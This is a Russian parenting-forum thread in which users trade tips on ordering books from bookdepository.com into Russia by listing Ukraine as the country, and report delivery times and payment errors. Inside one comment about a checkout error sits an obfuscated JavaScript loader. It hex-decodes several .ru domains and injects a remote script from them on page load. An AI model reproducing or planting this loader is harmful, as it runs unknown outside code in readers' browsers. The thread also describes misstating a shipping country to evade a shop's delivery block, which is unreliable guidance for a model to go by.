Войти
Мама мальчика (2 года), планирую беременность Москва

Как сделать заказ в bookdepository.com

Мама мальчика (10 лет) Москва

Добрый вечер! Мне пишут "Important Message

Please enter a valid ZIP or postal code" Что не так? Написала свой индекс Московский

Кстати, заказывала на Амазоне

0
27.04.2016
Мама двоих (13 лет, 5 лет) Москва

Здравствуйте!

Первый раз вижу такую проблему. Попробуйте может браузер сменить?
Страну Украину указали? На другие поля не ругается?
Я совсем недавно заказывала на московский адрес, все было ок.
0
27.04.2016
Мама мальчика (10 лет) Москва

ДД! Сижу целый день, никак не могу отправить заказ((( Да Страну указала Украину. Ошибка именно где индекс ....3 разных инд использовала...Все никак

0
28.04.2016
Мама двоих (13 лет, 5 лет) Москва

А ошибка возникает именно когда кнопку нажимаете или по ходу заполнения формы тоже есть? Я вот попробовала свой. Сначала на странице есть фраза про неверный индекс, как только я его заполняю, фраза исчезает...

0
28.04.2016
Мама мальчика (10 лет) Москва

Ошибка возникает когда нажимаешь кнопку, во время набора данных никаких ошибок не возникает.

0
28.04.2016
Мама двоих (13 лет, 5 лет) Москва

Может у нас разные понятия об ошибке )

А когда ввели индекс, на форме нет фразы про то, что он неверный?

Я забила просто 6 любых цифр без проболов и эта фраза о том, что индекс неверный пропала. Вбила в форму любые данные, все прошло, ругался только на карточку. Ну это и логично.

0
28.04.2016
Мама мальчика (10 лет) Москва

нет в том то и дело что когда все заполняли вводили индекс он не ругался после того как все ввели и нажали кнопку вывел ошибку про то что индекс неверный

Вот сижу и думаю в чем проблема?


Прошу прошения за беспокойство!!!

0
28.04.2016
Мама девочки (11 лет) Орел
Cкажите, пожалуйста, а Вы с Amazon.de ничего не заказывали? Интересует мнение бывалых...
0
28.06.2015
Мама двоих (13 лет, 5 лет) Москва

Заказывала. Отличный магазин! Если будут вопросы — пишите. 

Тут посмотрите мой отзыв об этом магазине. 

0
28.06.2015
Мама девочки (11 лет) Орел
Спасибо большое! Я на немецком хотела бы игрушки заказать. Но пугает стоимость доставки(( 28 евро + 8 евро за каждый килограмм! Тем более что игрушки деревянные, а, значит, тяжелые(((
0
28.06.2015
Мама двоих (13 лет, 5 лет) Москва
А вы не волнуйтесь, доставка там очень адекватная. Положите несколько товаров корзину, лучше штук 6-8, доставка на одну позицию будет небольшая. Дойдите до последнего шага, там вы увидите, сумму налога VAT, который будет для вас как скидка. Изначально на странице товара все указано с этим налогом. У меня получилось, что он фактически был равен доставке. Так что считайте, что она практически бесплатная. Качество товаров там намного выше, особенно по сравнению с нашими оффлайновыми магазинами. 
0
29.06.2015
Мама девочки (11 лет) Орел
О, спасибо! Успокоили меня! А то я начала грезить игрушками Haba)) Еще я слышала вариант объединения нескольких людей с тем, чтобы поделить расходы на доставку,  так якобы можно сэкономить...
0
29.06.2015
Мама двоих (13 лет, 5 лет) Москва

Да, Хаба — крутейшие игрушки. Причем с амазона их даже дешевле заказать, чем приехав в Германию, т.к. на амазоне на все всегда скидки + вычет налога. Попробуйте договориться конечно, даже с 1 человеком — уже большая экономия получится. 

0
29.06.2015
Мама девочки (11 лет) Орел
Поняла, спасибо! А как Вы думаете, стоит ждать каких-то особенных распродаж, скидок? Бывает "скидочное" время какое-то?
0
29.06.2015
Мама двоих (13 лет, 5 лет) Москва
Распродажи бывают на одежду, как просто скидки так и промокоды. Промокоды иногда публикуют прямо на главной странице.
0
29.06.2015
Москва

Здравствуйте! Спасибо, что поделились таким хитрым способом заказа. Жду доставки с 25 октября. А могут быть проблемы, если осталась галочка на "My shipping address is the same as billing address" ? На других сайтах есть информация, что её как раз нужно убирать.

0
15.11.2016
Мама двоих (13 лет, 5 лет) Москва

Добрый вечер! Нет, вы правильно ее поставили. Проблем быть не должно.

Я всегда ее ставлю и не только для этого магазина, а и для всех остальных.
0
15.11.2016
Москва

Спасибо, обнадёжили.

0
15.11.2016
Мама девочки (12 лет) Москва

не поделитесь информацией, дошла ли к Вам посылочка?

0
03.12.2016
Москва

Всё дошло)
Отправка: 25 октября
Прибытие: 17 ноября

0
06.04.2017
Мама девочки (11 лет) Москва

Здравствуйте! Подскажите, пожалуйста, пришла ли вам посылка с bookdepository ?) Хочу тоже заказать, но как-то страшновато)

0
07.01.2017
Москва

Дошла за 3 недели, всё в порядке.

0
06.04.2017
Пермь
Комментарий удален
0
01.02.2017
Мама двоих (25 лет, 13 лет) Москва

Сейчас посмотрела еще раз. при заказе в списке есть РФ, но в разделе "where do you deliver" в списке стран РФ нет

https://www.bookdepository.com/help/topic/HelpId/3/Which-countries-do-you-deliver-to#helpContent

0
01.02.2017
Мама двоих (25 лет, 13 лет) Москва

хочу заказать несколько книг, самая дорогая стоит 19 $)) вот и побаиваюсь через Украину))) А деньги в случае потери посылки они возвращают даже если заказать через Украину?

0
01.02.2017
Пермь

Закажите сначала одну самую дешевую из вашего списка). Вообще я прочитала много отзывов, прежде чем заказывать, пишут, что и деньги возвращают и повторно высылают, даже если через Украину. Адрес на посылке полностью российский стоит, только после российского адреса стоит надпись "UKRAINE" и эта надпись у меня была зачеркнута черным маркером, на почте зачеркнули, только на каком этапе пути не знаю)))

0
01.02.2017
Мама двоих (13 лет, 5 лет) Москва

Возвращают, не волнуйтесь. У меня была ситуация: заказывала через Украину 7 книг, пришло 6, ждала 3 недели, седьмая так и не пришла. Написала им письмо, они предложили вернуть деньги, я согласилась, вернули и на следующий день пришла седьмая книга. Злоупотреблять этим методом конечно не стоит, но они всегда на стороне покупателя.

0
07.02.2017
Мама двоих (13 лет, 11 лет) Ренн

ого, спасибо, я тоже хочу заказывать себе книги!
0
20.03.2015
Мама двоих (13 лет, 5 лет) Москва
Пожалуйста! Да к вам можно и просто так заказывать, без этих фокусов с Украиной ) 
0
20.03.2015
Мама двоих (13 лет, 11 лет) Ренн

то есть просто мой реальный адрес указывать?
0
20.03.2015
Мама двоих (13 лет, 5 лет) Москва
Ну конечно ) Для Франции просто реальный адрес. Просто если выбрать РФ в списке стран, то сайт сообщит, что временно прекратил туда доставлять, поэтому такие фокусы приходится делать. 
0
20.03.2015
Мама мальчика (13 лет) Казань
Кто боится через Украину,выбирайте Беларусь)) все приходит!!!
0
23.03.2015
Мама двоих (13 лет, 5 лет) Москва

Тоже вариант. Спасибо за совет ) 

0
23.03.2015

Дв! Кто последний раз заказывал? Все дошло? Прочитала у одной девочки, что если посыль не пришла и указан некорректный адрес (а получается, что когда мы пишем Украина и Потлм адрес российский - это неправильно), то деньги не возвращают. Никто не слышал?

0
02.12.2016
Мама девочки (12 лет) Москва

Заказала 21 ноября 2016 года, пришло 20 декабря в большой коробке в пызырчатой пленке. Заказывала мягкую игрушку груффало. Ждала, переживала, еще больше переживала, увидев Ваше сообщение. Кто боится всё-таки заказывать там в период действия санкций в адрес Российской федерации, можно пробовать заказывать на www.abebooks.com, это не магазин, а площадка для продавцов. Доставка платная, но можно найти продавцов с доставкой в Россию за 3-4$, что дешевле чем средняя доставка по Москве. Заказала на этом сайте дочурку груффало, так как на букдепозитари ее не было. Там доставка в Россию есть официально. Заказала так же 21 ноября получила примерно, через 2 недели. Трек тоже не дают и отследить нельзя.

0
25.12.2016

Не подскажите, а если заказывать в Казахстан через Украину, придет ли посылка? А то Казахстана тоже нет в списке. Печально очень.

0
25.12.2016
Ставрополь

спасибо,что написали про посылку! 27 ноября заказала через Украину в Ставрополь, еще пока не пришло!! наверно, уже после январских праздников....

0
29.12.2016

Спасибо, что отписались) попробую рискнуть и заказать)

0
29.12.2016
Мама двоих (11 лет, 5 лет) Москва

Крутой пост. А может по опыту подскажите, дешевле с букдепозитори заказывать или допустим есть девушка, которая раз в месяц летает в Германию, может купить на Амазоне и она привезёт?

0
13.11.2016
Мама двоих (13 лет, 5 лет) Москва

Если девушка раз в месяц летает и привезет, то многие книги, но не все, точно будут дешевле, т.к. на амазоне много скидок.

У амазона просто дорогая доставка к нам, но в вашей схеме получается, что доставка бесплатная. Проблема только в том, что книги обычно тяжелые, а багаж ограничен небольшим числом кг.
Ну если у вас есть такая знакомая, которая сможет так летать и передавать, то это очень здорово конечно.
0
15.11.2016
Мама двоих (11 лет, 5 лет) Москва

Спасибо, а вот интересно, на Амазоне самые дешёвые книги или может в германии есть магазин как наш лабиринт?:)

0
15.11.2016
Мама двоих (13 лет, 5 лет) Москва

Мне кажется, амазон дешевле. Я знаю еще бух24, но там нет скидок вообще практически.

Амазоны кстати все разные, английские книги дешевле на британской версии брать, но они есть и на немецкой. Надо все сравнивать.
0
15.11.2016
Мама двоих (11 лет, 5 лет) Москва

Спасибо, пойду изучать:)

0
15.11.2016
Мама троих (17 лет, 14 лет, 11 лет)
Спасибо за подробную инструкцию!
Но заказ не получается оформить(
Checkout unavailable Checkout is currently unavailable, please try again later.
Уже и Украину поставила, все равно никак(
В службе поддержки ответили, что такое бывает при неправильном вводе информации с карты. И если три раза подряд пытаешься оформить и ошибка, то дальнейшие заказы сделать невозможно в те. 24ч.
Я уверенна, что все правильно заполнила, на айхерб всегда заказываю с этой же картой, проблем нет.
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="17717",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
0
19.01.2016
Мама девочки (12 лет) Москва

Спасибо за полезную информацию. Заказала Груффало. Не смогла найти его ни в Москве, ни в Китае. Вернее видела его в московском интернет магазине по цене 3500-5500 руб в зависимости от размера, но даже там нет его в наличии (хотя по такой цене я все равно бы не стала брать). А на буке они 950-1700. Жалко нет в наличии дочурки Груффало, попробую на абебук заказать

0
21.11.2016
Мама троих (15 лет, 11 лет, 8 лет) Подольск

Я тоже Груффало хочу ))) Вы Украину в адресе писали, да?

0
01.12.2016
Мама девочки (12 лет) Москва

да, указала Украину

0
03.12.2016
Мама троих (15 лет, 11 лет, 8 лет) Подольск

Спасибо )))

0
04.12.2016
Мама мальчика (10 лет) Воронеж

Спасибо большое gae444ka за подробную инструкцию!

Возможно кому-то будет полезна эта информация... Заказ сделала 26 марта, отправили 27 марта, на почте посылка была 12 апреля. Доставка в Воронеж меньше 3 недель. Страну выбирала Украина, заказывала первый раз, положили сразу две книги.
0
17.04.2018
Городец

подскажите пожалуйста все еще можно заказать книги в Россию через Украину?или теперь напрямую в Россию можно покупать????????

0
08.05.2018
Мама двоих (12 лет, 10 лет) Уфа

Подскажите,почему вы написали оплачивать картой а не пейпалом?там тоже какие то особенности есть?

0
02.06.2015
Мама двоих (13 лет, 5 лет) Москва

Да, при оплате пайпалом сайт глючит и подставляет адрес из учетки пайпала, а нам нужен адрес со страной Украина. 

0
02.06.2015
Мама двоих (12 лет, 10 лет) Уфа
Спасибо большое за ответ!
0
03.06.2015
Мама двоих (13 лет, 5 лет) Москва

Пожалуйста, если будут какие еще вопросы — обращайтесь.

0
03.06.2015

Добрый вечер, огромное спасибо за подроьную инструкцию, Вы мне очень помогли)

Хотелось спросить, ничего страшного, если в поле где нужно заполнить адрес, я заодно написала свою страну и город (и сам адрес, соответственно, тоже), просто хотелось как-то обнадежить себя, что посылка придет

0
16.11.2018
Мама двоих (13 лет, 5 лет) Москва

Я думаю, что все будет ок.

0
16.11.2018
Комментарий удален
0
31.10.2018
Мама двоих (13 лет, 5 лет) Москва
Комментарий удален
0
31.10.2018
Мама троих (14 лет, 12 лет, 9 лет) Нижний Новгород

Недавно сама искала информацию, и поэтому добавлю в эту тему как основную: заказ через Украину доходит. Ко мне книжечка доехала всего за две недели, положили в почтовый ящик. Добавлю также, что два заказа с abebooks ко мне едут уже почти три месяца... Больше не буду через них заказывать. Заказ с betterworldbooks дошёл за месяц с небольшим, но книга разочаровала: не соответствовала фотографии на сайте (мне нужен был сборник, а пришёл один рассказ из этого сборника под похожей обложкой). Хотя сама виновата, надо было ISBN проверять. И состояние good тоже не порадовало: книга с порванными страницами, неприятная.

0
16.08.2017
Мама двоих (13 лет, 5 лет) Москва

Спасибо за отзыв.

С абебукс у меня неудачный опыт. Одну книгу ждала полгода, так и не приехала, попросила выслать замену, замена приехала через 2 месяца в ужасном состоянии - пахнет болотом, порванные страницы, а состояние было заявлено "как новая".
0
16.08.2017

Здравствуйте, вот у меня такой вопрос. Я заказала книгу в Кабардино-Балкарскую республику , городок Терек. Как думаете, она дойдёт до меня?😄 она выехала 24 июля. И вы можете подсказать, как указать адрес, пока не поздно стало))

0
04.08.2019
Альметьевск

Тоже недавно заказала книгу на этом сайте в Россию через Украину. Её отправили 9 июля. Посмотрим, пока что не пришла. Я живу в Казани.

0
10.08.2019
Альметьевск

Ого, только пришла домой и в ящике уведомление с почты. Магия. Мне заказ пришёл ровно за месяц)

0
10.08.2019
Мама мальчика (10 лет) Москва
Комментарий удален
0
16.05.2018
Мама девочки (15 лет) Сочи

Спасибо за подробную инструкцию, на днях сделала первый заказ,пока он в статусе "Processing". Не подскажите через сколько обычно они отправляют книги? По поводу доставки в Россию может им письмо написать и уточнить?

0
07.02.2017
Мама двоих (13 лет, 5 лет) Москва

По-разному, обычно до 3 дней ждать надо, они напишут про отправку каждой книги. Бывает, что все книги в одном заказе, а бывает, что каждую по одной отправляют и придется много извещений заполнять.

Про Россию не пишите, уже многие писали, пока бессмысленно.

0
07.02.2017
Мама девочки (15 лет) Сочи

Спасибо, поняла.

0
08.02.2017
Мама девочки (11 лет) Чебоксары

Спасибо за чудесный пост. Пошла выбирать книги.

Скажите, а невозможно никак заказать доставку так чтоб посылку отследить можно было. У нас так почта криво работает ,почтальона нет, извещения не приносят. Без идентификатора отказываются искать на почте

0
26.10.2016
Мама двоих (13 лет, 5 лет) Москва

Пожалуйста. Отслеживание сделать никак не получится. Попробуйте закажите небольшую книгу, если все будет хорошо, то еще что-нибудь. А вообще на почте России сменилось руководство и они наводят порядок, стало реально получше. Очереди немного поменьше, кое-где даже электронные очереди внедрили, заказы быстрее доходят.

0
01.11.2016
Екатеринбург

Таня, здравствуйте! сделала заказ по вашей инструкции, но кое-что упустила все же: забыла указать регион для своего города - Екатеринбург, СВЕРДЛОВСКАЯ ОБЛАСТЬ
сообразила, когда заказ уже был отправлен, и теперь волнуюсь, дойдут ли книги, были такие случаи у кого-н?
0
23.04.2016
Мама двоих (13 лет, 5 лет) Москва

Добрый вечер! У меня была ситуация, что я часть адреса не указала, но я писала и адрес меняли. Екатеринбург - большой город. Я думаю, все нормально дойдет, не волнуйтесь.

0
23.04.2016
Городец

подскажите пожалуйста все еще можно заказать книги в Россию через Украину?или теперь напрямую в Россию можно покупать????????

0
08.05.2018
Краснодар

Все еще можно.)

0
10.05.2018
Городец

Оплатила книгу. Теперь буду ждать) если придёт книга, то мне ещё так много всего нужно купить на этом сайте))если не придёт, то буду заказывать с Amazon Но там доставка дорогая((

0
10.05.2018
Мама троих (28 лет, 11 лет, 8 лет) Москва

Спасибо Вам огромное за этот пост!!! Вы, действительно, открыли для меня удивительный и очень полезный ресурс для заказа иностранных книг, да еще таким хитрым способом. Интересно, кто первым догадался так сделать? )))

Это работает!!! Попробовала в сентябре 2017. Заказала 2 книги (подешевле и подороже). Книжки шли месяц. При чем та которая дороже, была отправлена на день раньше, а пришла на неделю позже (уже успела начать переживать за нее, но нет, все хорошо).

0
11.10.2017
Мама двоих (25 лет, 13 лет) Москва

Здравствуйте! Хочу заказать книжки и вижу, что в списке стран присутствует Россия. Все равно делать заказ через Украину? Подскажите, пожалуйста!!! Я в первый раз)))

0
01.02.2017
Пермь
Комментарий удален
0
01.02.2017
Мама двоих (13 лет, 5 лет) Москва

Все равно через Украину.

0
07.02.2017
Москва

Попробовал ваш метод. Заказ сформировать получилось, но через день статус заказа изменился на "Cancelled and refunded", при этом деньги еще не вернулись. Значит все, закрыли лавочку?

0
28.01.2016
Мама двоих (13 лет, 5 лет) Москва

Деньги вернутся чуть позже, не волнуйтесь.

У меня такое было с одной карточкой (стандартный мастеркард), причем она была абсолютно нормальная, я платила ей в других интернет-магазинах, но букдепозитори ее по неизвестным причинам не принимал, причем также через день где-то сами заказ отменяли. Решение проблемы - просто другая карточка, попробуйте, может у вас также проблема в карте.
Вообще метод работал буквально 2 месяца назад, не думаю, что закрыли, пока я сообщений о том, что он перестал работать нигде не видела.
0
28.01.2016
Москва

Спасибо за советы. Все сработало. Оплата прошла по другой карте. 1 книгу получил через 2 недели. Еще 3 пришли вместе еще через неделю. Итого 3 недели на весь заказ. Отлично!

0
26.02.2016
Отправили книгу 14.03.15.Сама я из Москвы,следовала Вашим подсказкам,написала свой адрес,но страну указала Украину.
0
01.04.2015
Мама двоих (13 лет, 5 лет) Москва
Ясно. Подождите до 14 апреля, потом можно написать им в поддержку, чтобы отправили снова или деньги вернули. Все придет, не волнуйтесь. 
0
01.04.2015
Мама двоих (13 лет, 13 лет) Москва

Скажите, пришли ли вам книги? Собираюсь заказать и вся в сомнениях...

0
10.05.2015
Мама двоих (11 лет, 9 лет) Санкт-Петербург
вот все никак не решать) надо попробовать
P.S. Таня, тебе надо написать пост "как научиться экономить на акциях и скидках"))) это я про ваши семейные путешествия) прости, что не по теме) и вопросик у меня еще к тебе — есть еще немецкий сайт www.buch24.de — да, доставка платная, но если брать сразу несколько книг — то вроде получается в сумме дешевле — ничего не можешь про этот сайт сказать?
0
21.03.2015
Мама двоих (13 лет, 5 лет) Москва

Попробуй конечно, втянешься ) Тем более сейчас валюты вниз пошли. 

Да, я экономить люблю, почти хобби ))) 

бух24 нормальный магазин, планирую про него тоже пост написать. 

0
23.03.2015

Добрый вечер! Благодаря Вашей инструкции заказывала книги с сайта почти 3 года. Но вот уже 3 дня не могу сделать заказ. Когда переходишь к оплате, почему то все поля не активны. У меня одной так или все-таки эту схему раскусили и теперь ничего не закажешь? Если так, то я в трауре. Проверьте, пожалуйста, активно ли окно оплаты у Вас. Спасибо заранее.

0
25.02.2019
Москва

У меня так же. Тогда я решила оплатить через PayPal - там создала новый адрес, указав страну Украина, а все остальное написала своё московское. Оплата прошла, через месяц книга уже у меня.

0
27.03.2019
Краснодар

Зарегистрировалась, чтобы сказать автору поста БОЛЬШОЕ СПАСИБО!

Лайфхак все еще работает, и дай боги чтобы работал дальше, а еще лучше чтобы BD наконец-то подружились с нашей почтой, они уже не такие страшные.

Только что забрала книгу, сижу и пускаю слюни на нее. 😄 Пришла за 11 дней.

0
10.05.2018
Мама троих (27 лет, 24 года, 11 лет) Нижний Новгород

Вы не знаете, этот способ через Украину еще работает?

0
30.03.2016
Мама двоих (13 лет, 5 лет) Москва

Работает )

0
30.03.2016
Мама троих (27 лет, 24 года, 11 лет) Нижний Новгород

Спасибо, хочу попробовать.

0
30.03.2016

Девушки,кто-то что-то заказывал на Bookdepository после декабрьских изменений таможенных правил? По-прежнему стоит заказывать через Украину несмотря на то то, что Россия есть в списке?(этот магазин же через почту России доставляет кажется)

0
20.12.2017
Пермь

Эти таможенные изменения не касаются отправлений, которые доставляются почтой России, так что посылок из букдепозитори это не должно коснуться, но я в декабре не заказывала, т. к. на почте аврал, буду после новогодних праздников заказывать уже,и да, по прежнему заказывать через Украину, т.к. через Россию вам заказ не удастся создать, напишут, что не доставляют в эту страну))).

0
22.12.2017
Мама двоих (17 лет, 10 лет) Рязань

Фух, я - герой, я это сделала! Теперь осталось дождаться книги.

Спасибо за такой подробный инструктаж!
0
11.04.2017
Москва
Продолжаю так заказывать. Мне доходит 70% от заказанного)))), но когда что то не пришло, примерно через 2 месяца сообщаю им об этом и они мне снова высылают. Просят подтвердить адрес, и я со спокойной совестью подтвержадю (не смотря на Украину). Так что пока все свое получила.
0
20.03.2015
Мама двоих (13 лет, 5 лет) Москва

Странно, почему 70%, довольно много не приходит с первого раза.  Мне все приходит (тьфу тьфу тьфу) 

0
23.03.2015
Мама двоих (20 лет, 9 лет) Калининград

Здравствуйте. Хочу выразить Вам огромную благодврность за такой подробный пост. Заказала книжечку. Пришла за 18 дней. Огромное Вам спасибо.

0
16.10.2018
Мама двоих (13 лет, 5 лет) Москва

Спасибо за отзыв! :)

0
31.10.2018
Сосновоборск

Добрый день , подскажите пожалуйста что вводить в графу Reference name при заполнение адреса?

0
05.01.2018
Мама двоих (13 лет, 5 лет) Москва

Это поле для того, чтобы кратко назвать вводимый адрес, чтобы самому помнить. Даны примеры, "Дом", "Работа". Это поле нигде не проверяется сотрудниками доставки. Рекомендую ввести "home".

0
06.01.2018
Мама двоих (14 лет, 10 лет) Москва
Комментарий удален
0
11.12.2017
Мама троих (30 лет, 28 лет, 13 лет) Волгоград

Хмммм! Какой интересный способ заказа.... интересно, а этот фокус сработает с заказом одежды? С другого сайта, у которого нет доставки в Россию)

0
25.02.2017
Мама двоих (13 лет, 5 лет) Москва

Не думаю ) Про одежду ни разу не слышала про такой способ.

0
25.02.2017
Киев

Добрый день, большое спасибо за подробный обзор. Возвращают ли ( или вычитают) Bookdepository ндс?

0
12.02.2016
Мама двоих (13 лет, 5 лет) Москва

Не возвращают.

0
30.03.2016
Мама двоих (20 лет, 11 лет) Шатура

Подскажите, в последнее время ничего не заказывали? Как думаете ничего не изменилось в плане доставке, в связи с политической ситуацией?

0
12.10.2015
Мама двоих (13 лет, 5 лет) Москва

Знакомые заказывали, никто еще не жаловался, все работает.

Лично последний раз весной заказывала, все было отлично, хотя ситуация с Украиной еще годом ранее усложнилась

0
10.11.2015
Добрый вечер!12.03.15 заказала книгу с этого сайта,через 11 дней будет уже как месяц,но книги все нет.Не подскажете,что делать?
0
01.04.2015
Мама двоих (13 лет, 5 лет) Москва
Здравствуйте! А какого числа отправили книгу и в каком вы городе?
0
01.04.2015
Мама двоих (14 лет, 11 лет) Волгоград

Не сомневаюсь, что сейчас опять куча вопросов будет: "Украина? Точно? А дойдут?")))))))))))) Будешь еще третий пост писать))) 

0
20.03.2015
Мама двоих (13 лет, 5 лет) Москва
))) Надеюсь, что этот пост будет последний
0
23.03.2015
Мама двоих (13 лет, 13 лет) Москва

Спасибо большое за столь нужный пост. А почему платить только картой, а не PayPal?

0
15.01.2017
Санкт-Петербург

Я заказывала на днях, успешно отправили сегодня посылку мне - на российский адрес со страной Украина, все точно по инструкции (СПАСИБО автору ). Сначала я как раз хотела paypal использовать (это проще), но оказалось, что в том случае, если там указываешь Украину в адресе, нужен еще и индекс настоящий из Украины (5 цифр, кажется)… А через сайт адрес получается полностью российский, только в конце добавляется Ukraine или UA.

0
19.01.2017
The Puffin Baby and Toddler Treasury Complete Book of First Experiences от изд. Usborne

Похожие записи